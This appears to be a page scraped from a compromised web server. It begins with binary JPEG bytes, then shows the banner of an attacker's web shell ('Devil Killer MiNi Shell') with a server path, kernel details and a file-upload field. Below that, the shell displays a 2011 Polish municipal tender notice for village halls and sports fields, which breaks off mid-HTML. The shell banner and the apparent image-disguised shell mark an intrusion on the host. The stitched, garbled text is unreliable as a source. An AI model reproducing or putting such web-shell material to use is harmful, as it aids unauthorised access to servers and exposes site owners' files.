JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110404/62856-N-2011.html

<p class="kh_header"><b>Włocławek: Remont świetlic wiejskich w miejscowości Koszanowo, Telążna Leśna i Świętosław, budowa świetlicy wiejskiej w miejscowości Nowa Wieś oraz budowa boisk sportowych w miejscowości Smólsk, Łagiewniki, Dębice, Koszanowo i Pińczata wraz z urządzeniem placów zabaw</b><br>
<b>Numer ogłoszenia: 62856 - 2011; data zamieszczenia: 04.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Włocławek , ul. Królewiecka 7, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 0-54 230 53 00; 230 53 37, faks 054 230 53 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlic wiejskich w miejscowości Koszanowo, Telążna Leśna i Świętosław, budowa świetlicy wiejskiej w miejscowości Nowa Wieś oraz budowa boisk sportowych w miejscowości Smólsk, Łagiewniki, Dębice, Koszanowo i Pińczata wraz z urządzeniem placów zabaw.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie  przedmiotu zamówienia oraz wielkość lub zakres zamówienia : Remont świetlic wiejskich w miejscowości Koszanowo, Telążna Leśna i Świętosław, budowa świetlicy wiejskiej w miejscowości Nowa Wieś oraz budowa boisk sportowych w miejscowości Smólsk, Łagiewniki, Dębice, Koszanowo i Pińczata wraz z urządzeniem placów zabaw

III.3.1. Przedmiotem zamówienia  jest budowa świetlicy wiejskiej w miejscowości Nowa Wieś na nieruchomości oznaczonej geodezyjnie jako działka nr 96/6  wraz z niezbędną infrastrukturą techniczną .
Zakres prac robót budowlanych obejmuje : 
1. Roboty ziemne,
2. Roboty murowe stanu surowego,
3.Dach,
4.Elewacja,
5.Stolarka okienna i drzwiowa,
6. Roboty wykończeniowe wewnętrzne
7.Roboty wykończeniowe zewnętrzne
Zakres prac instalacyjnych i przyłącza wodno-kanalizacyjnego, i instalacji mechanicznej obejmuje:
1. Wykonanie przyłącza wodociągowego z rur 32 PE metodą przewiertu sterowanego na długości 8 m z włączeniem do istniejącego wodociągu poprzez nawiertkę 32/110.
2.Wykonanie przykanalika kanalizacji sanitarnej z rur 0,16 PCW o łącznej długości 21 m metodą wykopu otwartego, z odtworzeniem istniejącej nawierzchni asfaltowej i i przywróceniem jej do stanu pierwotnego. Na przyłączu kanalizacyjnym zamontować jedną studnię rewizyjną dn 1200 betonową  i jedną studnię  przelotową dn 425 z tworzywa sztucznego,
3. Wykonanie instalacji wod-kan. z rur z tworzywa sztucznego wraz z izolacją termiczną  i montażem wodomierza dn 20 i zaworu antyskażeniowego dn 25 wraz z zaworami odcinającymi, armaturą i białym montażem. Podgrzewanie ciepłej wody poprzez podgrzewacz elektryczny V=101.
4. Wykonanie wewnętrznej instalacji kanalizacji sanitarnej (leżaki kanalizacyjne) z rur kanalizacyjnych PVC (pomarańczowych) ułożonych pod posadzką przyziemia. Wykonanie pionu i podejść kanalizacyjnych powyżej posadzki parteru z rur i kształtek PVC ( szarych) wg PN-74/C-89200, z wyposażeniem pionu kanalizacyjnego w rewizję PVC o śred.110 mm wg PN-74/C-89203 i rurą wywiewną z PVC wg PN-81/C-89203.
5. Wykonanie wentylacji mechanicznej wywiewnej w pomieszczeniach poprzez montaż wentylatorów łazienkowych montowanych w kanałach wentylacyjnych z rur spiro , zakończonych wywiewkami  wentylacyjnymi dn 160 wyprowadzonymi ponad dach. Wykonanie wentylacji  nawiewnej poprzez montaż kratek w drzwiach z przestrzeni ogólnej hallu i montaż w pomieszczeniach hallu kratki nawiewnej  dn 160 montowanej w stropie, z wyprowadzeniem rurą spiro dn 160 na dach budynku z zakończeniem nawietrzakiem dachowym dn 160, mocowanym do podstawy dachowej. Wszystkie przewody wentylacyjne wykonać z blachy ocynkowanej grubości 0,7 mm. 
Zakres prac instalacji elektrycznej:
1.Instalacje oświetleniowe, instalacja gniazd, instalacja wentylacji, ogrzewanie elektryczne , instalacja odgromowa. 

III.3.2 Przedmiotem zamówienia   jest budowa boiska sportowego wielofunkcyjnego i placu zabaw  na nieruchomości oznaczonej geodezyjnie jako  działki 32/41 

Zakres robót ujętych w kosztorysie obejmuje:
1.	wykonanie robót ziemnych -usunięcie ziemi urodzajnej, korytowanie pod boisko i odwodnienie z wywiezieniem urobku poza teren budowy,
2.	wykonanie odwodnienia boiska w postaci drenów z tłucznia kamiennego 40-63 mm 
w osłonie z geowłókniny 
3.	wykonanie nawierzchni boiska (312m2) - nawierzchnia poliuretanowa dwuwarstwowa o grubości 13 mm na warstwie stabilizującej z granulatu gumowego i lepiszcza poliuretanowego o grub. 3 cm na podbudowie z kruszywa kamiennego w obrzeżach betonowych stanowiących ograniczenie boiska,
4.	wykonanie chodników (110,6m2) z kostki brukowej betonowej grafitowej na podsypce cementowo-piaskowej oraz opaski żwirowej wokół boiska o pow. 164m2,
5.	montaż wyposażenia boiska -stojaków do koszykówki 
i słupków do siatkówki,
6.	montaż ławek 4.szt dla widzów na stelażu stalowym osadzonym 
w fundamentach betonowych,
7.	wykonanie ogrodzenia z siatki stalowej ocynkowanej powlekanej tworzywem 
o wysokości 5 m na słupkach z rur stalowych kwadratowych zabetonowanych 
w fundamentach z betonu wraz z montażem bramy z furtką,
8       ustawienie urządzeń zabawowych : huśtawka podwójna, ważka podwójna, bujaki 
         sprężynowe(2 szt.), tablica regulaminowa

III.3.3   Przedmiotem inwestycji  jest budowa boiska  do gry w piłkę koszykową z jednym stojakiem do koszykówki oraz remont świetlicy wiejskiej w miejscowości Koszanowo 
 
          Zakres robót ujętych w kosztorysie obejmuje:

1.	wykonanie robót ziemnych - usunięci ziemi urodzajnej grub. 15cm na pow. 50,8m2,
2.	ustawienie  obrzeży 28m,
3.	budowa boiska z kostki betonowej grub. 8cm w kolorze czerwonym, bezfazowej 48m2 z wbudowaniem jednego stojaka do koszykówki typu gęsia szyja oraz zamontowanie za stanowiskiem wrzutowym piłkochwytów wys. 5m na szer. 5m  na trzech słupach stalowych fi 80mm w fundamentach 40x40x100cm z zawieszeniem siatki polipropylenowej.
4.	ustawienie 1 ławki
5.	regulacja wysokościowa Istniejącej studni betonowej z płytą nastudzienną
6.	wykucie z muru i założenie nowych drzwi do kuchni i zaplecza,
7.	wykonanie posadzki w w/w pomieszczeniach łącznie z izolacją poziomą
8.	ułożenie glazury na ścianach i terakoty na podłodze w kuchni i zapleczu,
9.	ułożenie boazerii z płyt MDF na ścianach w Sali nr 2 do pełnej wysokości pod nowy sufit,
10.	montaż stropu podwieszanego w dwóch poziomach +2,40 i + 2,60 z wycieleniem wełną mineralną gr. 6 cm sala nr 2 
11.	montaż stropu podwieszanego - maskującego w kuchni,
12.	wykonanie nowego podestu i stopni wejściowych na zewnątrz obiektu
13.	założenie nowych opraw oświetleniowych w pomieszczeniach zaplecza i kuchni 

III.3.4. Przedmiotem zamówienia  jest budowa boiska sportowego do gry w piłkę koszykową wraz z montażem urządzenia zabawowego w miejscowości Łagiewniki 

Zakres robót ujętych w kosztorysie obejmuje:
1.	wykonanie robót przygotowawczych - roboty pomiarowe, usunięcie ziemi urodzajnej,
2.	wykonanie robót ziemnych- profilowanie podłoża wraz z zagęszczeniem,
3.	ustawienie  obrzeży,
4.	wykonanie nawierzchni chodników z kostki brukowej betonowej szarej na podsypce cem.-piaskowej
5.	budowa boiska z kostki betonowej grub. 8cm w kolorze czerwonym, bezfazowej wraz 
6.	z montażem 2  stojaków do kosza typu  gęsia szyja i montażem słupków do siatkówki
7.	wykonanie ogrodzenia wys. 4m   z 1 furtką i 1 furtką przy istniejącym placu zabaw
8.	montaż urządzenia zabawowego  - huśtawka podwójna ( doposażenie istniejącego placu zabaw) oraz 4 ławek parkowych ( przy projektowanym boisku)

III. 3.5. Przedmiotem zamówienia  jest budowa boiska sportowego do gry w piłkę koszykową wraz z montażem urządzenia  zabawowego w miejscowości Pinczata 

Zakres robót ujętych w kosztorysie obejmuje:
1.	wykonanie robót przygotowawczych - roboty pomiarów
2.	wykonanie robót ziemnych- usunięcie ziemi urodzajnej, wyrównanie niecki w terenie - nasyp 64m3 wraz z zagęszczeniem 
3.	ustawienie  obrzeży,
4.	budowa boiska z kostki betonowej grub. 8cm w kolorze czerwonym, bezfazowej 200m2
5.	wraz z montażem dwóch koszy typu gęsia szyja  i wykonaniem fundamentów, montaż
6.	2 szt ławek parkowych 
7.	zamontowanie podwójnej huśtawki  
8.	wykonanie robót wykończeniowych -plantowanie ręczne terenu

III. 3.6. Przedmiotem zamówienia  jest budowa boiska sportowego do piłki koszykowej i placu zabaw dla dzieci zabaw w miejscowości  Smólsk

Zakres robót ujętych w kosztorysie obejmuje:
1.	wykonanie robót przygotowawczych - roboty pomiarów
2.	wykonanie robót ziemnych,
3.	ustawienie  obrzeży,
4.	wykonanie nawierzchni chodnik z kostki brukowej betonowej szarej na podsypce cem. piaskowej 
5.	wykonanie schodów terenowych na plac wraz z przepustem
6.	budowa boiska z kostki betonowej grub. 8cm w kolorze czerwonym, bezfazowej o pow 200m2 na wzmocnionym podłożu z gruntu stabilizowanego cementem wyposażeniem 
7.	kpl. stojaków z koszami i siatką ze słupkami  
8.	wykonanie ogrodzenia wokół boiska na wys. 5m
9.	zamontowanie  3 furtek
10.	wykonanie placu zabaw ze żwiru płukanego wraz z montażem huśtawki, ważki i bujaków
11.	sprężynowych 
12.	wykonanie robót wykończeniowych - profilowania oraz obsiania trawą skarp

III. 3.7. Przedmiotem zamówienia  jest remont świetlicy wiejskiej w miejscowości Telążna Leśna. 
	
	Zakres robót ujętych w kosztorysie obejmuje: 
1.	wykucie z muru starych istniejących drzwi wejściowych oraz drzwi do dużej sali i zamontowanie nowych dwuskrzydłowych łącznie z obrobieniem ościeży,
2.	założenie nowych skrzydeł drzwiowych do pomieszczeń WC
3.	wykucie na zapleczu naświetla stalowego, zamurowanie otworu cegłą z jednoczesnym osadzeniem okna PCV dwudzielnego RU oraz uzupełnienie tynków, założenie nowych parapetów okiennych
4.	przeniesienie szafki energetycznej(przyłącza) razem z licznikiem i zabezpieczeniami w inne miejsce, założenie 6 nowych opraw,
5.	przekucie otworu na nowe drzwi łączące kuchnię z zapleczem , łącznie z osadzeniem ich i obróbką
6.	postawienie nowych ścian z gazobetonu rozdzielających świetlicę od pawilonu łącznie z tynkiem,
7.	wygrodzenie pomieszczeń tzw. Chłodni,
8.	uzupełnienie niezbędnych tynków,
9.	malowanie farbami emulsyjnymi zaplecza,
10.	wykonanie podestów wejściowych z polbruku.

III.3.8. Przedmiotem zamówienia  jest remont świetlicy wiejskiej w miejscowości Świętosław. 

Zakres robót ujętych w kosztorysie obejmuje: 
1.	wykucie z muru i założenie nowych drzwi wewnętrznych do pomieszczeń WC i magazynków na korytarzu,
2.	ułożenie glazury na ścianach w pomieszczeniach WC,
3.	ułożenie terakoty na podłodze w pomieszczeniach WC i na korytarzu,
4.	cyklinowanie i lakierowanie podłogi drewnianej w dużej Sali,
5.	wykonanie kominka z wkładem stałym z płaszczem wodnym , z podłączeniem do sieci , z zamontowaniem kominka stalowego o h=5.0 m, z wykonaniem zabudowy z płytek z obłożeniem wykładziną z piaskowca,
6.	w pomieszczeniach WC wymiana umywalek oraz muszli klozetowych na kompakty WC.

Szczegółowy zakres robót został określony w projektach budowlanych , specyfikacji technicznej wykonania robót, w kosztorysach ofertowych oraz niniejszej specyfikacji istotnych warunków zamówienia. Projekty budowlane, specyfikacje techniczne oraz kosztorysy ofertowe i przedmiary robót dostępne są na stornie internetowej Urzędu Gminy Włocławek : www.gmina.wloclawek.pl - link Przetargi własne urzędu ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.00.00.00-7, 45.26.10.00-4, 45.45.00.00-6, 45.31.10.00-0, 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium dla zamówienia podstawowego w wysokości 10.000,00 zł , które może być wniesione w jednej z poniższych form:
w pieniądzu : na konto Zamawiającego  : 
BOŚ 70 1540 1069 2001 8700 6419 0052   - przed upływem terminu składania ofert Zamawiający udokumentuje wyciągiem z konta potwierdzenie wpłaty wadium przez Wykonawcę. 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach  ubezpieczeniowych
-	poręczeniach udzielanych  przez podmioty, o których mowa w art. 6b ust.5 pkt2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U.Nr 109 poz. 1158 z póź  zm. ). 
2) Sposób przekazania: dołączone w oryginale do oferty przed upływem terminu składania ofert. 
-	Wadium złożone w oryginale do oferty wyczerpuje postawiony warunek. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego. Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
3) Dowód wpłaty wadium należy załączyć do oferty. 
4) Zamawiający zwraca  wadium zgodnie z art. 46 ust 1-4 ustawy z dnia 29 stycznia 2004 roku -Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759  z późn. zm ) 
5) Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach , o których mowa w art. 46 ust 4a i ust 5 ustawy z dnia 29 stycznia 2004 roku -Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759  z późn. zm )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony przez Wykonawcę , jeżeli złoży wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony , jeśli Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie  roboty budowlane w zakresie stanowiącym przedmiot zamówienia tj. budowa boisk sportowych do siatkówki lub koszykówki o nawierzchni poliuretanowej , robót ogólnobudowlanych i remontowych niezbędnych do  spełnienia warunków wiedzy i doświadczenia . Wymagane minimum 3 roboty budowlane w zakresie budowy boisk do piłki siatkowej i koszykówki o nawierzchni poliuretanowej , robót ogólnobudowlanych i remontowych w budynkach , o wartości nie mniejszej niż 800 000,00 PLN ( brutto) , wykonanych  w ramach jednego kontraktu  z podaniem daty i miejsca wykonywania oraz załączeniem dokumentu , że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ( np. referencje, protokoły odbioru) .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony , jeżeli Wykonawca wykaże , iż na czas realizacji zamówienia  będzie dysponował sprzętem o następujących parametrach techniczno- eksploatacyjnych :
a) koparko-spycharka 0,15 m3 - min 1 sztuka,
b) koparka gąsienicowa 0,60 m3- min. 2 sztuki,
c) samochód skrzyniowy 5-10 t - min 2 sztuki ,
d) układarką mas poliuretanowych , natryskarka - min. 1 szt.;
e)  ubijakiem spalinowym min. 200 kG - min. 2 szt.,
f) drobny sprzęt budowlanych ( betoniarka, rusztowania do wysokości 3 m) - min 1 sztuka 
g) piła do cięcia drzewa - po 1 sztuce</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony jeśli Wykonawca przedstawi wykaz osób , które będą uczestniczyć w wykonywaniu zamówienia , a w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
- Kierownik budowy  -  1 osoba z uprawnieniami budowlanymi ( kserokopia uprawnień z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa) oraz uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie  zgodnie z art. 12 ustawy z dnia 7 lipca 1994 roku Prawo budowlane ( tekst jednolity Dz.U.z 2006 r Nr 156 poz.1118 ze zmianami)  prawa budowlanego ( wymagany min. pięcioletnie doświadczenie w funkcji kierownika budowy) .
- Kierowca - 2 osoby z uprawnieniami  
- 5  pracowników fizycznych 
lub  złoży oświadczenie, że osoby te posiadają uprawnienia wskazane w wykazie .
Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony , jeżeli Wykonawca wykaże, iż posiada :
a) środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż   900 000,00 zł
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na min. 200 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

